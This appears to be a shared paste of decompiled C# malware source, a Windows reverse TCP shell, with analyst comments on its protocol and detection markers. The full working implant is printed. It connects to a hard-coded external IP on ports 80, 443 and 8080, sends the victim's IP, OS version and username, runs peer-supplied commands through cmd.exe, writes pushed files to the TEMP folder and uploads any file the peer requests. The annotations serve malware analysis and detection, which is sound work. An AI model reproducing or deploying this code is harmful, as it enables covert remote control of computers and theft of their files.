James_inthe_box

Decoded

Jan 24th, 2018
  1. using System;
  2. using System.IO;
  3. using System.Collections.Generic;
  4. using System.Text;
  5. using System.Threading;
  6. using System.Net;
  7. using System.Net.Sockets;
  8. using System.Diagnostics;
  9. using System.Runtime.InteropServices;
  // Analyst annotations: only comments were added, every code line is unchanged.
  // Summary: reverse-connect remote shell. run() dials one hard-coded IPv4 address on
  // ports 80, 443 and 8080, sends a LOGIN record describing the host, then services
  // records framed as TOKEN|*|payload: CMD (line piped to cmd.exe), FILEHEAD plus raw
  // bytes (file written under %TEMP%), FILERECEIVE (local file sent to the peer).
  // The transport is a bare NetworkStream; nothing in this class wraps it in TLS or
  // builds HTTP, so the first client bytes on the wire are the literal "LOGIN|*|".
  // Review points for detection: cleartext "LOGIN|*|", "CMD|*|" and "FILEHEAD|*|"
  // markers on those ports, a cmd.exe child with redirected stdio, and file creation
  // in the TEMP directory by the hosting process.
  10. public class ReverseTCPShell{
  // Declared 8 KB limits; the methods below use the literal 1024 * 8 instead of these.
  11. const int MAX_SEND_BUFFER = 1024 * 8;
  12. const int MAX_RECV_BUFFER = 1024 * 8;
  // All state is static: one connection, one cmd.exe child and one inbound file
  // transfer are tracked at a time. count, UserInput and fileext are never read by
  // any method in this class (FileReceive declares its own local named count).
  13. public static int count = 0;
  14. public static TcpClient tcpClient;
  15. public static NetworkStream stream;
  16. public static StreamReader streamReader;
  17. public static StreamWriter streamWriter;
  18. public static StringBuilder UserInput;
  19. public static Process CmdProc;
  20. public static string filename, fileext, filesize;
  21. public static int offset = 0;
  22. public static byte[] filebuffer;
  23. public static Thread listen;
  // iscmdexit == true means no live cmd.exe child; isfilesend == true means raw
  // bytes that match no token are treated as content of the announced file.
  24. public static bool iscmdexit=true;
  25. public static bool isfilesend=false;
  // des: destination pair, s = address string, d = TCP port (see use in run()).
  26. public class des{
  27. public string s;
  28. public int d;
  29. public des(string _s, int _d){this.s = _s;this.d=_d;}}
  // run(): never returns. Each round tries the same address on 80, 443, 8080 in
  // order; runth() sleeps 20 s after every attempt and the round ends with a further
  // 20 s sleep, giving a fixed retry cadence while the peer is unreachable.
  30. public static void run(){des de1 = new des("27.126.186.222",80);des de2 = new des("27.126.186.222",443);des de3 = new des("27.126.186.222",8080);
  31. for (; ; ){runth(de1.s, de1.d, 20);runth(de2.s, de2.d, 20);runth(de3.s, de3.d, 20);System.Threading.Thread.Sleep(20000);}}
  // runth(): despite the for(;;), the trailing return makes this a single pass:
  // one start() call followed by a sleep of sl seconds.
  32. public static void runth(string si, int po, int sl){for (; ; ){start(si, po, sl);System.Threading.Thread.Sleep(sl * 1000);return;}}
  // start(): connects, builds reader/writer with Encoding.Default, and launches
  // StartListen on a new thread. The calling thread then checks isOnline() every
  // 10 s; on disconnect it closes the streams, kills a running cmd.exe child and
  // returns. The SleepTime parameter is not used. Any exception (including a failed
  // Connect) is swallowed and ends the attempt.
  33. public static void start(string IP, int port, int SleepTime){try{tcpClient = new TcpClient();if (!tcpClient.Connected){tcpClient.Connect(IP, port);
  34. stream = tcpClient.GetStream();streamReader = new StreamReader(stream, System.Text.Encoding.Default);
  35. streamWriter = new StreamWriter(stream, System.Text.Encoding.Default);listen = new Thread(new ParameterizedThreadStart(StartListen));
  36. listen.Start(tcpClient);while (true){if (!isOnline(tcpClient)){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }tcpClient.Close();return;}
  // The next line finishes start() and opens StartListen(). StartListen ignores its
  // client argument and works on the static stream: it sends the LOGIN record once,
  // then reads up to 8 KB per call and hands each non-empty read to DataReceived().
  // One read is treated as one message; there is no length prefix or reassembly.
  // Any exception raised while reading or dispatching closes the streams, kills the
  // cmd.exe child if one is running, and ends the listener thread.
  37. Thread.Sleep(10000);}}}catch (Exception){return;}}private static void StartListen(object client){
  38. SendLoginInfo();while (true){try{byte[] RData = new byte[1024 * 8];int len = stream.Read(RData, 0, RData.Length);
  39. if (len > 0){byte[] data = new byte[len];Array.Copy(RData, 0, data, 0, len);DataReceived(data, len);}}
  40. catch (Exception){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }break;}}}
  // isOnline(): reports the socket as dead when it polls readable (1000 microsecond
  // wait) with zero bytes available, or when Connected is false.
  41. public static bool isOnline(TcpClient c){return !((c.Client.Poll(1000, SelectMode.SelectRead) && (c.Client.Available == 0)) || !c.Client.Connected);}
  // startCmd(): spawns cmd.exe without the shell, with stdin, stdout and stderr
  // redirected. Output and error lines are delivered asynchronously to
  // SortOutputHandler; the Exited event flips iscmdexit back to true via CmdExited.
  42. public static void startCmd(){CmdProc = new Process();CmdProc.StartInfo.FileName = "cmd.exe";
  43. CmdProc.StartInfo.UseShellExecute = false;CmdProc.StartInfo.RedirectStandardInput = true;
  44. CmdProc.StartInfo.RedirectStandardOutput = true;CmdProc.StartInfo.RedirectStandardError = true;
  45. CmdProc.EnableRaisingEvents = true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
  46. CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
  47. CmdProc.Exited += new EventHandler(CmdExited);CmdProc.Start();
  48. CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();iscmdexit = false;}
  // CmdExited(): marks the shell as gone so the next CMD record starts a new one.
  49. public static void CmdExited(object sender, EventArgs e){iscmdexit = true;}
  // DataReceived(): protocol dispatcher. The buffer is decoded with Encoding.Default
  // and split on "|*|"; the first field selects the action (length is not used):
  //   FILEHEAD    payload "name|ext|size": allocates a size-byte buffer, creates an
  //               empty file at %TEMP%\name and arms isfilesend. The name comes from
  //               the peer and is appended to the TEMP path without validation.
  //   FILESEND    accepted but does nothing.
  //   FILERECEIVE payload up to the first CRLF is a local path passed to FileReceive().
  //   CMD         payload is passed to CmdManager().
  //   default     while isfilesend is set, the raw bytes are appended to the buffer;
  //               once offset reaches the announced size the buffer is written to the
  //               file, cleared, and isfilesend is reset.
  // Nothing here checks that a payload field exists or that incoming bytes fit the
  // announced size; such failures throw and are handled by StartListen's catch.
  50. public static void DataReceived(byte[] data, int length){
  51. string receivedmsg = System.Text.Encoding.Default.GetString(data);string[] rdArray = receivedmsg.Split(new string[] { "|*|" }, StringSplitOptions.None);switch (rdArray[0]){case "FILEHEAD": string temp = System.Environment.GetEnvironmentVariable("TEMP");DirectoryInfo info = new DirectoryInfo(temp); string[] finfo = rdArray[1].Split(new string[] { "|" }, StringSplitOptions.None);filename=info.FullName+"\\"+finfo[0];fileext = finfo[1];filesize = finfo[2];filebuffer = new byte[Convert.ToInt32(finfo[2])];FileStream fstream = new FileStream(filename, FileMode.Create);fstream.Close();fstream.Dispose();isfilesend = true;offset = 0;break;case "FILESEND":break;
  52. case "FILERECEIVE":
  53. string[] fr = rdArray[1].Split(new string[] { "\r\n" }, StringSplitOptions.None);FileReceive(fr[0]);break;case "CMD":CmdManager(rdArray[1]);break;
  54. default:if(!isfilesend){break;}if (offset < Convert.ToInt32(filesize)){Array.Copy(data, 0, filebuffer, offset, data.Length );offset += data.Length;
  55. if (offset >= Convert.ToInt32(filesize)){FileStream filestream = new FileStream(filename, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.ReadWrite);
  // The next line finishes DataReceived() and opens FileReceive(). Despite its name,
  // FileReceive sends a local file to the peer: a "FILEHEAD|*|name|ext|length" text
  // line first, then the file content as raw 8 KB chunks with a 10 ms pause between
  // writes. On failure it reports "CMD|*|File access error: " plus the full exception
  // text back to the peer; the FileStream is not closed on that path.
  56. filestream.Write(filebuffer, 0, filebuffer.Length);filestream.Close();filestream.Dispose();Array.Clear(filebuffer, 0, filebuffer.Length);isfilesend=false;}}break;}}public static void FileReceive(string filep){try{FileInfo fInfo = new FileInfo(filep);string fsend = "FILEHEAD|*|" + fInfo.Name + "|" + fInfo.Extension + "|" + fInfo.Length.ToString();
  57. streamWriter.WriteLine(fsend);streamWriter.Flush();Thread.Sleep(5);FileStream fstream = new FileStream(filep, FileMode.Open);int size = 0;
  58. while (size < fInfo.Length){byte[] sendbuffer = new byte[1024 * 8];int count = fstream.Read(sendbuffer, 0, sendbuffer.Length);
  59. size += count;byte[] buf = new byte[count];Array.Copy(sendbuffer, 0, buf, 0, count);stream.Write(buf, 0, count);stream.Flush();Thread.Sleep(10);}fstream.Close();}catch(Exception e){streamWriter.WriteLine("CMD|*|File access error: "+e.ToString());
  // The next line finishes FileReceive(), holds all of CmdManager() and opens
  // SortOutputHandler(). CmdManager starts cmd.exe on demand and writes the received
  // text to its stdin unmodified, so the peer controls the full command line.
  60. streamWriter.Flush();}}public static void CmdManager(string cmd){if(iscmdexit){startCmd();}CmdProc.StandardInput.WriteLine(cmd);}public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine){
  // SortOutputHandler(): relays every non-empty cmd.exe output line to the peer as
  // "CMD|*|<line>"; write errors are silently ignored.
  // SendLoginInfo() (opens on the same line): builds "LOGIN|*|<ipv4>|*|<os version>|*|<user>".
  // The address is the last IPv4 entry returned by Dns.GetHostEntry("") (the empty
  // name resolves to the local host per the .NET documentation), falling back to
  // 127.0.0.1; version and user come from System.Environment.
  61. StringBuilder strOutput = new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append("CMD|*|" + outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception) { }}}public static void SendLoginInfo(){IPAddress ipaddr = IPAddress.Parse("127.0.0.1");foreach (IPAddress _ip in Dns.GetHostEntry("").AddressList){if (_ip.AddressFamily.ToString() == "InterNetwork"){ipaddr = _ip;}}string token = "LOGIN";Version ver = System.Environment.OSVersion.Version;string name = System.Environment.UserName.ToString();string sdata = token + "|*|" + ipaddr.ToString() + "|*|" + ver.ToString() + "|*|"+ name;
  62. byte[] ddata = System.Text.Encoding.Default.GetBytes(sdata);Send(ddata, (UInt32)ddata.Length);}
  // Send(): forwards non-empty buffers to SendWithSplit with an 8 KB chunk size;
  // the chunking uses sendmsg.Length, msgSize only gates the call.
  63. public static void Send(byte[] sendmsg, UInt32 msgSize){if (msgSize > 0){SendWithSplit(sendmsg, sendmsg.Length, 1024 * 8);}return;}
  // SendWithSplit(): writes data to the static stream in nSplitSize pieces with a
  // 10 ms pause after each full piece, then the remainder. Returns the number of
  // bytes written, or -1 if that does not equal nSize. The decoded string outp is
  // computed but never used.
  64. public static int SendWithSplit(byte[] data, int nSize, int nSplitSize){string outp = System.Text.Encoding.Default.GetString(data);int flag = 0;
  65. while ((flag + nSplitSize) < nSize){stream.Write(data, flag, nSplitSize);stream.Flush();flag += nSplitSize;System.Threading.Thread.Sleep(10);}
  66. if (flag < nSize){stream.Write(data, flag, nSize - flag);flag += (nSize - flag);}if (flag == nSize){return flag;}else{return -1;}}}